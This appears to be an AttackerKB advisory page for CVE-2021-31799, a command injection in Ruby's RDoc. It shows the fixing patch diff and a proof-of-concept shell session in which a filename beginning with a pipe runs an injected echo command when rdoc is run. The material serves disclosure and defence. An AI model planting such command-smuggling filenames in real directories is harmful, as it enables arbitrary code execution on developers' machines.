CVE-2021-31799

2021-07-3000:00:00

attackerkb.com

In RDoc 3.11 through 6.x before 6.3.1, as distributed with Ruby through 3.0.1, it is possible to execute arbitrary code via | and tags in a filename.

Recent assessments:

wvu-r7 at May 03, 2021 1:43am UTC reported:

CVE-2021-31799

Perlisms strike again in this RDoc command injection. Kernel#open is not safe.

Patch

File is lib/rdoc/rdoc.rb.

   ##
   # Removes file extensions known to be unparseable from +files+ and TAGS
   # files for emacs and vim.

   def remove_unparseable files
     files.reject do |file, *|
       file =~ /\.(?:class|eps|erb|scpt\.txt|svg|ttf|yml)$/i or
         (file =~ /tags$/i and
-         open(file, 'rb') { |io|
+         File.open(file, 'rb') { |io|
            io.read(100) =~ /\A(\f\n[^,]+,\d+$|!_TAG_)/
          })
     end
   end

PoC

wvu@kharak:~/Downloads/poc$ cat vulnerable
cat: vulnerable: No such file or directory
wvu@kharak:~/Downloads/poc$ touch "| echo HACK THE PLANET &gt; vulnerable # tags"
wvu@kharak:~/Downloads/poc$ rdoc
Parsing sources...
100% [ 1/ 1]  | echo HACK THE PLANET &gt; vulnerable # tags

Generating Darkfish format into /Users/wvu/Downloads/poc/doc...

  Files:      1

  Classes:    0 (0 undocumented)
  Modules:    0 (0 undocumented)
  Constants:  0 (0 undocumented)
  Attributes: 0 (0 undocumented)
  Methods:    0 (0 undocumented)

  Total:      0 (0 undocumented)
    0.00% documented

  Elapsed: 0.1s

wvu@kharak:~/Downloads/poc$ cat vulnerable
HACK THE PLANET
wvu@kharak:~/Downloads/poc$

Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 3